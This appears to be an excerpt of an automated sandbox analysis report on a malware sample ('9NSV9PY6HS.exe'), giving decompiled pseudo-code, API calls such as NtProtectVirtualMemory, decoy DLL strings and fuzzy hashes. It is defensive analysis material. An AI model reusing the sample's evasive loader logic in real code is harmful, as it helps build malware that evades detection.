CreateDisc.dll, xrefs: 005EC187
d3d10core.dll, xrefs: 005EC236
findnetprinters.dll, xrefs: 005EC23B

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: CreateDisc.dll$GetProcessorSystemCycleTime$d3d10core.dll$findnetprinters.dll
API String ID: 190572456-2621806979
Opcode ID: e0c802ada9b347662d5e4768fbc25f58d87bf1bada88569dfc1c5d563700fc6b
Instruction ID: e726c0091eb63329bc9f26555a9a09194c08d09f90aa58ee79bad6a0ff7b342d
Opcode Fuzzy Hash: e0c802ada9b347662d5e4768fbc25f58d87bf1bada88569dfc1c5d563700fc6b
Instruction Fuzzy Hash: 9741B175A507469FDB10DFF9EC946CA3F73FB29312F085229D980ABB61E6350602C752

Uniqueness

Uniqueness Score: -1.00%

Function 0062B4C9 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 64
sleepCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0062B4C9(void* __eax, void* __ecx) {
				intOrPtr _t21;
				char _t23;
				char _t30;
				void* _t36;
				short _t38;
				void* _t44;
				void* _t47;

				_t21 =  *((intOrPtr*)(_t47 - 8));
				_t30 = "api-ms-win-core-processthreads-l1-1-0.dll" - __ecx;
				_t38 = __ecx + 0x52e04e;
				 *0x65819a = _t38;
				Sleep(0x745);
				__di = 0;
				__bh = __bh + __al;
				 *((intOrPtr*)(__ebp - 8)) = __eax;
				__al = __al + __al;
				0x21cd35 =  *((intOrPtr*)(__ebp - 8));
				 *((intOrPtr*)(__ebp - 0x14)) = __ebx;
				__bl = 0;
				__ebx = __ebx - 0x4c3ac3;
				__eax = "hpz3lw71.dll";
				 *((intOrPtr*)(__ebp - 0x10)) = "hpz3lw71.dll";
				__ebx = 0;
				__bx = __bx - 0x3e62;
				__eax =  *((intOrPtr*)(__ebp - 8));
				 *((intOrPtr*)(__ebp - 0x1c)) = 0;
				if(0 > __ecx) {
					L13:
					__di = __di >> __cl;
					__bh =  *0x65afdb; // 0x5c
					__bh = 0xf8;
					__ebx = __ebx + 0x763eb;
					 *((intOrPtr*)(__ebp - 8)) = __eax;
					__bl = __bl - __al;
					__ebx = __ebx + __eax;
				} else {
					__ecx = __ecx + 0x5b4f26;
					if(__ecx >= __ecx) {
						 *0x65afd5 =  *0x65afd5 - __dh;
						 *0x658240 =  *0x658240 + __si;
						__esi = __esi + __esi;
						__si = __si - 0xcc4e;
						goto L13;
					}
				}
				 *0x65809e =  *0x65809e + __bx;
				__ebx = 0;
				if( *0x65afcb == 0) {
					 *((intOrPtr*)(_t47 - 8)) = _t21;
					_t23 =  *((intOrPtr*)(_t47 - 8));
					if(_t23 < 0x31) {
						L8:
						_t36 = ("NlsLexicons0047.dll" & 0x000021ee) - _t23 + 0x33a541;
					} else {
						if(_t30 >= _t30) {
							L5:
							 *0x65afd8 = _t23;
							_t30 = _t23;
						} else {
							_t30 = _t30 + 0x51;
							 *0x65afce =  *0x65afce + _t38;
							if(_t38 >= _t38) {
								 *0x659839 =  *0x659839 + 0x9398;
								goto L5;
							}
						}
						if(0x3e8 == 0 || _t44 > 0) {
							goto L8;
						}
					}
					 *0x65afcc =  *0x65afcc - _t36;
					_push(E0062A6F2);
					_push(L0061182F);
					return _t23;
				} else {
					_pop(__ebp);
					return __eax;
				}
			}

0x0062b4f9
0x0062b501
0x0062b504
0x0062b50a
0x0062b51c
0x0062b521
0x0062b524
0x0062b526
0x0062b529
0x0062b530
0x0062b533
0x0062b538
0x0062b53a
0x0062b543
0x0062b548
0x0062b54b
0x0062b54d
0x0062b552
0x0062b555
0x0062b55a
0x0062b58d
0x0062b58d
0x0062b590
0x0062b596
0x0062b598
0x0062b59e
0x0062b5a1
0x0062b5a3
0x0062b55c
0x0062b55c
0x0062b56a
0x0062b579
0x0062b57f
0x0062b586
0x0062b588
0x00000000
0x0062b588
0x0062b56a
0x0062b5a5
0x0062b5ac
0x0062b5b5
0x0062a685
0x0062a68d
0x0062a692
0x0062a6c9
0x0062a6db
0x0062a694
0x0062a697
0x0062a6b5
0x0062a6b8
0x0062a6be
0x0062a699
0x0062a699
0x0062a69c
0x0062a6a4
0x0062a6ac
0x00000000
0x0062a6ac
0x0062a6a4
0x0062a6c3
0x00000000
0x00000000
0x0062a6c3
0x0062a6e1
0x0062a6e7
0x0062a6ec
0x0062a6f1
0x0062b5bb
0x0062b5bb
0x0062b5bc
0x0062b5bc

APIs

Sleep.KERNEL32(000003E8), ref: 0062B51C

Strings

dispex.dll, xrefs: 0062B4EF
Heap32ListNext, xrefs: 0062B4CD
hpz3lw71.dll, xrefs: 0062B543
api-ms-win-core-processthreads-l1-1-0.dll, xrefs: 0062B4FC

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: Sleep
String ID: Heap32ListNext$api-ms-win-core-processthreads-l1-1-0.dll$dispex.dll$hpz3lw71.dll
API String ID: 3472027048-6693281
Opcode ID: 5e1d79f29783f966790c5ad5890b0e8390d1c98d189f64396a80f29f3aa2f11d
Instruction ID: 9362f32d7bae623c77ebae51ad6a25bcc17cac15ca816b4b8691df9e6743c0c4
Opcode Fuzzy Hash: 5e1d79f29783f966790c5ad5890b0e8390d1c98d189f64396a80f29f3aa2f11d
Instruction Fuzzy Hash: EA218CBAE107169FCB10CFB8E8D42DD7FB2EB28315F0851799885E7742E2B90A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0062B444 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 0062B447

Strings

GetProcessorSystemCycleTime, xrefs: 0062B47D
NetMessageNameGetInfo, xrefs: 0062B45C

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: TerminateThread
String ID: GetProcessorSystemCycleTime$NetMessageNameGetInfo
API String ID: 1852365436-3753872557
Opcode ID: d210cf16303e921ea1ce2d9b00e098be04f87677664fcce138f07ca7f6202226
Instruction ID: 26faa22ecf49f05e5fad42cf8e9a0437e934d90835cae9645b99c08bd69e175a
Opcode Fuzzy Hash: d210cf16303e921ea1ce2d9b00e098be04f87677664fcce138f07ca7f6202226
Instruction Fuzzy Hash: 8F01E8B4F50649AFCB01DFF9D4C46EDBFF1EB18325F5440AAA944E7341D2385A468B01

Uniqueness

Uniqueness Score: -1.00%

Function 005C739D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 005C7403

Strings

Heap32ListNext, xrefs: 005C73A3
hpz3lw71.dll, xrefs: 005C7415

Memory Dump Source

Source File: 00000000.00000002.269775335.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9nSv9py6hs.jbxd

Similarity

API ID: AddressProc
String ID: Heap32ListNext$hpz3lw71.dll
API String ID: 190572456-465454396
Opcode ID: 684161ac3ca67acf315958b9dc2c3610ffc517ce3ca80aa39548f183ca1956a9
Instruction ID: 2a93cb5c3123eebbdba519347e245a60c7db395008e79c38462569a5e5b34c53
Opcode Fuzzy Hash: 684161ac3ca67acf315958b9dc2c3610ffc517ce3ca80aa39548f183ca1956a9
Instruction Fuzzy Hash: 4BF08C38A647099FCB10EFB4EC859887FB3FB2C712F002568D991E3B61E67415459B0A

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 9NSV9PY6HS.exePID: 4424, Parent PID: 5672COMMON

Execution Graph

Execution Coverage:	18.4%
Dynamic/Decrypted Code Coverage:	59.3%
Signature Coverage:	13.2%
Total number of Nodes:	295
Total number of Limit Nodes:	20

Executed Functions

Function 00407E62 Relevance: 1.6, APIs: 1, Instructions: 109
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E00407E62(intOrPtr __ebx, signed int __edx, intOrPtr __edi, void* __esi, void* _a6, void* _a13, intOrPtr _a27, intOrPtr _a31, intOrPtr _a35, intOrPtr _a47, intOrPtr _a51, intOrPtr _a55, intOrPtr _a63, intOrPtr _a67) {
				void* _v1;
				void* _v4;
				signed char _v133;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr* _t38;
				unsigned int _t40;
				void* _t41;
				intOrPtr _t42;
				unsigned int _t49;
				signed int _t71;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t85;
				intOrPtr _t88;
				void* _t94;
				void* _t98;
				signed int _t100;

				_t84 = __esi;
				_t81 = __edi;
				_t71 = __edx;
				_t37 = __ebx;
				_t40 = 0x4280d8;
				_push(0x30);
				_t24 = E00408824(0x4280d8);
				if(_t71 < 0) {
					_t40 =  !_t71 >> 0x10;
					_t71 = _t71 & 0x0000ffff;
				}
				_push(_t40);
				L00408C41();
				_t41 = 0;
				_t85 = _t94 - 1;
				_t42 = _t41 + 1;
				_a47 = _t42;
				_a27 = _t81;
				_a31 = _t85;
				_a35 = _t37;
				_a51 = _t88;
				asm("pushfd");
				_t25 = _t24 - 1;
				_t38 = _t25 + (_t71 << 0x20);
				_t98 = _t84 - 1 + 1;
				asm("lodsd");
				_a55 = _t25;
				_pop(_t26);
				_a63 = _t26;
				fs = ds;
				_push(_t88);
				_t49 = _t42 + 6 >> 0x20;
				_t74 =  <  ? _t49 : 0x20;
				_t99 = _t98 - ( <  ? _t49 : 0x20);
				_t100 = _t98 - ( <  ? _t49 : 0x20) & 0xfffffff0;
				if(_t49 >> 3 != 0) {
					asm("repe dec eax");
					asm("movsd");
				}
				_a67 = _t85;
				 *_t38(); // executed
				fs = 0x53;
				_v133 = _v133 & 0x000000fe;
				_t36 = _a55;
				ss = 0x2b;
				_push(_a63 + 4);
				asm("popfd");
				_push(_t36);
				L00408C48();
				return _t36;
			}

0x00407e62
0x00407e62
0x00407e62
0x00407e62
0x00407e62
0x00407e67
0x004085df
0x004085e6
0x004085f0
0x004085f3
0x004085f3
0x00408600
0x00408603
0x00408608
0x0040860a
0x0040860c
0x0040860d
0x00408611
0x00408615
0x00408619
0x0040861d
0x00408620
0x00408621
0x00408626
0x00408629
0x0040862c
0x0040862e
0x00408631
0x00408633
0x00408638
0x0040863a
0x0040863e
0x00408648
0x0040864b
0x00408650
0x00408655
0x00408659
0x0040865b
0x0040865b
0x0040865d
0x0040867b
0x00408682
0x00408690
0x004086a5
0x004086b7
0x004086ba
0x004086bb
0x004086bd
0x004086be
0x004086c3

APIs

NtReleaseMutant.NTDLL ref: 0040867B

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID: MutantRelease
String ID:
API String ID: 1238314799-0
Opcode ID: 5e990eb9d78a4560e5f2a9dc684ae8df51aef304404ec74f8e2ba29e53231417
Instruction ID: b6cd392af80a97ebbed8ebdf35e0fce64f698e10b06e4ea64111de304b932c7e
Opcode Fuzzy Hash: 5e990eb9d78a4560e5f2a9dc684ae8df51aef304404ec74f8e2ba29e53231417
Instruction Fuzzy Hash: 8231937050C6184BDB4CEE19E9826A937D1EB99314F10522DF9DBD32C6DE34D8828ACE

Uniqueness

Uniqueness Score: -1.00%

Function 004075C6 Relevance: 1.6, APIs: 1, Instructions: 109
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E004075C6(intOrPtr __ebx, signed int __edx, intOrPtr __edi, void* __esi, void* _a6, void* _a13, intOrPtr _a27, intOrPtr _a31, intOrPtr _a35, intOrPtr _a47, intOrPtr _a51, intOrPtr _a55, intOrPtr _a63, intOrPtr _a67) {
				void* _v1;
				void* _v4;
				signed char _v133;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr* _t38;
				unsigned int _t40;
				void* _t41;
				intOrPtr _t42;
				unsigned int _t49;
				signed int _t71;
				intOrPtr _t81;
				void* _t84;
				intOrPtr _t85;
				intOrPtr _t88;
				void* _t94;
				void* _t98;
				signed int _t100;

				_t84 = __esi;
				_t81 = __edi;
				_t71 = __edx;
				_t37 = __ebx;
				_t40 = 0x428110;
				_push(0x20);
				_t24 = E00408824(0x428110);
				if(_t71 < 0) {
					_t40 =  !_t71 >> 0x10;
					_t71 = _t71 & 0x0000ffff;
				}
				_push(_t40);
				L00408C41();
				_t41 = 0;
				_t85 = _t94 - 1;
				_t42 = _t41 + 1;
				_a47 = _t42;
				_a27 = _t81;
				_a31 = _t85;
				_a35 = _t37;
				_a51 = _t88;
				asm("pushfd");
				_t25 = _t24 - 1;
				_t38 = _t25 + (_t71 << 0x20);
				_t98 = _t84 - 1 + 1;
				asm("lodsd");
				_a55 = _t25;
				_pop(_t26);
				_a63 = _t26;
				fs = ds;
				_push(_t88);
				_t49 = _t42 + 6 >> 0x20;
				_t74 =  <  ? _t49 : 0x20;
				_t99 = _t98 - ( <  ? _t49 : 0x20);
				_t100 = _t98 - ( <  ? _t49 : 0x20) & 0xfffffff0;
				if(_t49 >> 3 != 0) {
					asm("repe dec eax");
					asm("movsd");
				}
				_a67 = _t85;
				 *_t38(); // executed
				fs = 0x53;
				_v133 = _v133 & 0x000000fe;
				_t36 = _a55;
				ss = 0x2b;
				_push(_a63 + 4);
				asm("popfd");
				_push(_t36);
				L00408C48();
				return _t36;
			}

0x004075c6
0x004075c6
0x004075c6
0x004075c6
0x004075c6
0x004075cb
0x004085df
0x004085e6
0x004085f0
0x004085f3
0x004085f3
0x00408600
0x00408603
0x00408608
0x0040860a
0x0040860c
0x0040860d
0x00408611
0x00408615
0x00408619
0x0040861d
0x00408620
0x00408621
0x00408626
0x00408629
0x0040862c
0x0040862e
0x00408631
0x00408633
0x00408638
0x0040863a
0x0040863e
0x00408648
0x0040864b
0x00408650
0x00408655
0x00408659
0x0040865b
0x0040865b
0x0040865d
0x0040867b
0x00408682
0x00408690
0x004086a5
0x004086b7
0x004086ba
0x004086bb
0x004086bd
0x004086be
0x004086c3

APIs

NtReleaseMutant.NTDLL ref: 0040867B

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID: MutantRelease
String ID:
API String ID: 1238314799-0
Opcode ID: 0729a699da830ac608a964dca32d0d7145aba77cc20edccb8ed32594fa537ffa
Instruction ID: 718c63b12e4627f901efa37b6bca4480e248ec5b6ad8f047bec5aae19c75308e
Opcode Fuzzy Hash: 0729a699da830ac608a964dca32d0d7145aba77cc20edccb8ed32594fa537ffa
Instruction Fuzzy Hash: B931937050C6184BDB4CEE19E9826A937D1EB99314F10522DF9DBD32C6DE34D8928ACE

Uniqueness

Uniqueness Score: -1.00%

Function 004085FB Relevance: 1.6, APIs: 1, Instructions: 99
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E004085FB(intOrPtr __ebx, void* __ecx, signed int __edx, intOrPtr __edi, void* __esi, void* _a3, void* _a10, void* _a17, intOrPtr _a27, intOrPtr _a31, intOrPtr _a35, intOrPtr _a47, intOrPtr _a51, intOrPtr _a55, intOrPtr _a63, intOrPtr _a67) {
				void* _v4;
				signed char _v133;
				void* _t24;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t36;
				intOrPtr* _t38;
				void* _t40;
				void* _t41;
				intOrPtr _t42;
				unsigned int _t49;
				signed int _t69;
				intOrPtr _t83;
				intOrPtr _t86;
				void* _t92;
				void* _t96;
				signed int _t98;

				_t69 = __edx;
				_t40 = __ecx;
				_t24 = E00408824(__ecx);
				_push(_t40);
				L00408C41();
				_t41 = 0;
				_t83 = _t92 - 1;
				_t42 = _t41 + 1;
				_a47 = _t42;
				_a27 = __edi;
				_a31 = _t83;
				_a35 = __ebx;
				_a51 = _t86;
				asm("pushfd");
				_t25 = _t24 - 1;
				_t38 = _t25 + (_t69 << 0x20);
				_t96 = __esi - 1 + 1;
				asm("lodsd");
				_a55 = _t25;
				_pop(_t26);
				_a63 = _t26;
				fs = ds;
				_push(_t86);
				_t49 = _t42 + 6 >> 0x20;
				_t72 =  <  ? _t49 : 0x20;
				_t97 = _t96 - ( <  ? _t49 : 0x20);
				_t98 = _t96 - ( <  ? _t49 : 0x20) & 0xfffffff0;
				if(_t49 >> 3 != 0) {
					asm("repe dec eax");
					asm("movsd");
				}
				_a67 = _t83;
				 *_t38(); // executed
				fs = 0x53;
				_v133 = _v133 & 0x000000fe;
				_t36 = _a55;
				ss = 0x2b;
				_push(_a63 + 4);
				asm("popfd");
				_push(_t36);
				L00408C48();
				return _t36;
			}

0x004085fb
0x004085fb
0x004085fb
0x00408600
0x00408603
0x00408608
0x0040860a
0x0040860c
0x0040860d
0x00408611
0x00408615
0x00408619
0x0040861d
0x00408620
0x00408621
0x00408626
0x00408629
0x0040862c
0x0040862e
0x00408631
0x00408633
0x00408638
0x0040863a
0x0040863e
0x00408648
0x0040864b
0x00408650
0x00408655
0x00408659
0x0040865b
0x0040865b
0x0040865d
0x0040867b
0x00408682
0x00408690
0x004086a5
0x004086b7
0x004086ba
0x004086bb
0x004086bd
0x004086be
0x004086c3

APIs

NtReleaseMutant.NTDLL ref: 0040867B

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID: MutantRelease
String ID:
API String ID: 1238314799-0
Opcode ID: ce97db314db1a3770283ab71ddbbd7fd6ff433ef94a9b4193022cc0ee8ea9e78
Instruction ID: ed5cc0da6b562c0fb7da2a7b70dc16ff72ed87cb19ea06367fa5620dbc942f36
Opcode Fuzzy Hash: ce97db314db1a3770283ab71ddbbd7fd6ff433ef94a9b4193022cc0ee8ea9e78
Instruction Fuzzy Hash: 5E21627051C6084BDB4CEE1DE88259977D1EB9D314F10522DF9DED3386DA30E8928AC9

Uniqueness

Uniqueness Score: -1.00%

Function 004017C4 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004017C4() {
				long _v12;
				long _v16;
				void* _v20;
				void* _t7;
				intOrPtr* _t17;
				void* _t20;

				_t17 =  &_v16;
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0x427f3c;
				 *((intOrPtr*)(_t17 + 8)) = 0x188;
				_t7 = E00401EAC(_t17, 0x427f3c, 0x4280c4, E0040181F); // executed
				_t20 = _t7;
				if( *_t17 != 0) {
					NtProtectVirtualMemory(0xffffffff,  &_v20,  &_v16, _v12,  &_v12); // executed
				}
				return _t20;
			}

0x004017c9
0x004017cb
0x004017d6
0x004017e5
0x004017f5
0x004017fa
0x00401800
0x00401815
0x00401815
0x0040181e

APIs

NtProtectVirtualMemory.NTDLL(000000FF,0040181F,004280C4,?,?,004280C4,0040181F,?,?,?,0040135D), ref: 00401815

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 74c67f4150a9e21fd7b8afbaca220237238ad2e944510e147ed504125c947de1
Instruction ID: 2da6b0fe1d41cf3cb92c38bd0109d9347cb8595f90c23d8479c817fc854148bd
Opcode Fuzzy Hash: 74c67f4150a9e21fd7b8afbaca220237238ad2e944510e147ed504125c947de1
Instruction Fuzzy Hash: B0F0BE327092626BD740EA2CD800A6BB7A5EFC4710B91C62EF428D72D0E7349D55C7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040181F Relevance: 1.5, APIs: 1, Instructions: 28
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0040181F(intOrPtr* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;
				long _t6;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr* _t18;

				_t18 = __ecx;
				_t16 =  *0x4270a0; // 0x8aea652f
				_t5 = E00402510(0x4270a0, __edx);
				_t6 = 0;
				if(_t16 == _t5) {
					_t17 = _a4;
					_t6 = NtProtectVirtualMemory(0xffffffff, _t18 + 4, _t18 + 8, 4, _t18 + 0xc); // executed
					if(0 >= 0) {
						 *_t18 = _t17;
						return 1;
					}
				}
				return _t6;
			}

0x00401821
0x00401823
0x0040182e
0x00401835
0x00401839
0x0040183b
0x0040184f
0x00401853
0x00401855
0x00000000
0x00401859
0x00401853
0x0040185c

APIs

NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 0040184F

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 7f744fe24283b5f1af5994e8df28a17c999e0a0e0d3360809f4bbbad1111a6bf
Instruction ID: 260e1397b00198ac13ebbf403c16c729ee050b1f22f221601b93a2a9ce9ac495
Opcode Fuzzy Hash: 7f744fe24283b5f1af5994e8df28a17c999e0a0e0d3360809f4bbbad1111a6bf
Instruction Fuzzy Hash: 7DE092733042165FD724AA24DC50D6773D9DBC4338711CA3EE666D32D0E670F8468768

Uniqueness

Uniqueness Score: -1.00%

Function 004071A4 Relevance: 1.3, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E004071A4(intOrPtr __ecx, void* __edx, signed char _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				void* _t14;
				void* _t15;
				intOrPtr* _t31;

				_t31 =  &_v36;
				_t19 = _a4;
				_v44 = 0x18;
				_v40 = 0;
				_v36 = __ecx;
				_v32 = 0x40;
				_v28 = 0;
				_v24 = 0;
				_t14 = 0x100020;
				if(_a4 != 0) {
					_t14 = 0x100001;
				}
				_push(0x60);
				_push(7);
				_push( &_v20);
				_push( &_v44);
				_push(_t14);
				_push(_t31); // executed
				_t15 = E00407D69(0); // executed
				if(_t15 >= 0) {
					return E00406C40( *_t31, _t19 & 0x000000ff);
				}
				return _t15;
			}

0x004071a7
0x004071ac
0x004071b0
0x004071ba
0x004071be
0x004071c2
0x004071ca
0x004071ce
0x004071da
0x004071e1
0x004071e8
0x004071e8
0x004071f7
0x004071f9
0x004071fb
0x004071fc
0x004071fd
0x004071fe
0x004071ff
0x00407206
0x00000000
0x00407211
0x0040721c

Strings

@, xrefs: 004071C2

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 3ec00215e6181e529752efdf192a8eb46b084d86e1bf96d7ad657440e6293b2c
Instruction ID: 7027c082a78ffe46f7d6c0884e947a56292da9e5c5fde8803506e48586b20cc5
Opcode Fuzzy Hash: 3ec00215e6181e529752efdf192a8eb46b084d86e1bf96d7ad657440e6293b2c
Instruction Fuzzy Hash: 4E01DBB1A083016FD314CB25C891BABBBE8DFC4780F04882EB5C8D7380E279D948C792

Uniqueness

Uniqueness Score: -1.00%

Function 004058F0 Relevance: 1.3, Strings: 1, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E004058F0(void* __eax, void* __ecx, intOrPtr __edx, char _a4) {
				void* _t4;
				intOrPtr* _t7;
				intOrPtr* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x40785c
				_t7 = _t8;
				 *_t7 = __edx;
				_push( *_t1);
				_push(0x3000);
				_push(_t7);
				_push(0);
				_push(0xffffffff); // executed
				_t4 = E00407559(_t10); // executed
				return _t4;
			}

0x004058f2
0x004058f6
0x004058f8
0x004058fa
0x004058fb
0x00405900
0x00405901
0x00405904
0x00405906
0x0040590f

Strings

\x@\x@, xrefs: 004058F2, 004058FA

Memory Dump Source

Source File: 00000001.00000002.294433871.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_9NSV9PY6HS.jbxd

Similarity

API ID:
String ID: \x@\x@
API String ID: 0-1822752678
Opcode ID: 3ce62fb3fb97f53a084514e8da002942082a331d3b84e83518cc3435c0bbe4ed
Instruction ID: 1d431f5a9ca7be094ee3d5a8bf2d13fd57a10c8e9bd504fffa66b39d8d4c13c4
Opcode Fuzzy Hash: 3ce62fb3fb97f53a084514e8da002942082a331d3b84e83518cc3435c0bbe4ed
Instruction Fuzzy Hash: E1C012F25052207EE16456095C06FA37B8CCB55730F2547297968562C0D1707C4081B6

Uniqueness

Uniqueness Score: -1.00%

Function 00408844 Relevance: .3, Instructions: 283
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00408844(signed int __ecx, signed int __edx) {
				void* _v16;
				signed int _v820;
				signed int _v824;
				intOrPtr _v828;
				signed int _v832;
				char _v1080;
				char _v1092;
				char _v1096;
				char _v1100;
				char _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed char _v1164;
				signed int _v1168;
				intOrPtr _v1172;
				signed int _t121;
				void* _t123;
				signed int _t124;
				char _t127;
				void* _t133;
				signed int _t136;
				void* _t139;
				signed int _t140;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int _t150;
				signed int _t155;
				signed int _t158;
				signed int _t159;
				signed int _t160;
				signed char _t161;
				signed int _t163;
				signed int _t164;
				signed int _t166;
				signed int _t173;
				intOrPtr* _t179;
				signed int _t185;
				signed int _t186;
				signed char _t201;
				signed int _t202;
				intOrPtr* _t207;
				signed int _t208;
				signed int _t211;
				signed int _t212;
				signed char* _t213;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t218;
				signed int _t219;
				void* _t220;
				signed int _t221;
				signed int _t222;
				intOrPtr _t223;
				signed int* _t224;
				signed int _t225;
				signed int _t226;
				void* _t228;
				void* _t238;

				_t202 = __edx;
				_t228 = (_t226 & 0xfffffff8) - 0x480;
				_t219 = __ecx;
				_t158 = E00408824(__ecx);
				_t212 = _t202;
				if(_t219 == 0x4280c8) {
					__eflags = (_t158 & _t212) - 0xffffffff;
					if((_t158 & _t212) != 0xffffffff) {
						L49:
						return _t158;
					}
					_t159 = _t219;
					_t213 =  &_v1144;
					_t220 = L00408C8B(_t213);
					_t119 =  *_t213;
					_v1164 =  *_t213;
					_v1148 = 0;
					__eflags = _t213[4];
					if(_t213[4] != 0) {
						_v1164 = 0;
						_t150 = E004058F0(_t119,  &_v1164, _t220, 4);
						__eflags = _t150;
						if(_t150 >= 0) {
							_push(_v1140);
							E00408CB2(_t150, _t220, _v1164, _v1144);
						}
					}
					_t204 = _v1164;
					_push(_v1140);
					_push(_v1144);
					_t173 = E004048D0( &_v1080, _v1164);
					_t214 = 0;
					_t121 =  &_v1100;
					 *((intOrPtr*)(_t121 - 4)) = 0;
					 *_t121 = 0;
					_v1124 = 0x42815f;
					__eflags = _t173;
					_t221 = _t159;
					_v1128 = _t121;
					if(__eflags == 0) {
						_v1168 = 0;
						_t160 = 0;
						__eflags = 0;
					} else {
						_v1168 = _t173;
						_t121 = E00406974(_t173, _t204, __eflags);
						_t160 =  *(_t228 + 0x158 + _t121 * 8);
						_t214 =  *((intOrPtr*)(_t228 + 0x15c + _t121 * 8));
					}
					L13:
					_t205 = _t221;
					E00408BFE(_t121,  &_v1104, _t205);
					_v1136 = _t214;
					_v1132 = _t160;
					_t123 = E00408CD0(_t221, 1, _t160, _t214);
					 *(_t221 + 4) = _t205;
					 *_t221 = _t123;
					_t41 = _t221 + 8; // 0x4280d8
					_v1120 = _t41;
					_t124 = E00408824(_t41);
					_t215 = _t124;
					if((_t124 | _t205) == 0) {
						L38:
						if(_t221 == 0x4280c8) {
							_t158 = _v1132;
							_t212 = _v1136;
						} else {
							_t158 = _v1132;
							_t212 = _v1136;
							_t248 = _t158 | _t212;
							if((_t158 | _t212) != 0) {
								_t158 = 0;
								_t133 = E00408CD0(_t221, _t248, 0, 0);
								 *(_t221 + 4) = _t205;
								 *_t221 = _t133;
								_t212 = 0;
							}
						}
						E004024F5( &_v1156);
						L44:
